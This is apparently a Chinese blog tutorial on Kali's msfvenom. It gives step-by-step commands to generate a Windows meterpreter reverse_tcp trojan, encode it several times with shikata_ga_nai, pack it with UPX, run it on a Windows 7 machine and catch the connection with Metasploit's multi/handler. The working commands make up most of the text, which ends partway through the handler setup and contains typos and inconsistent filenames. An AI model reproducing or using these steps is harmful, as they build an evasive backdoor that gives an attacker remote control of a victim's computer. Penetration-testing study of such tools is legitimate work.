msfvenom

摘要

在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。


msfvenom

:>>>

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.

  • 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
  • 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
  • 工具:MSF.

0x00

开启:postgresql

root@kali:~# service postgresql start

查看帮助

命令:

root# msfvenom -h

msfvenom_第1张图片

部分参数:>>>

-p 选择一个载荷[payload],或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
-f exe 生成EXE格式
LHOST,LPORT 监听上线的主机IP和端口

文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式

root@kali:~# msfvenom --help-formats
Error: Executable formats
    asp, aspx, aspx-exe, dll, elf, elf-so, 
exe, exe-only, exe-service, exe-small, hta-psh, 
loop-vbs, macho, msi, msi-nouac, osx-app, psh, 
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, 
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

过程

2、生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令:>>>

 root# msfvenom -p windows/meterpreter/reverse_tcp -o

3、现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: >>>

root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

4、upx加壳:>>>

upx -5 /root/Desktop/acn.exe

4、把生成的abc.exe放到win7下.执行.

5、在命令行下,打开msfconsole.

命令:>>>

root # msfconsole

6、本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: >>>

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

生成一个程序的过程

[http://www.jianshu.com/p/8d3f94390eab]

你可能感兴趣的:(安全,Tools,CTF)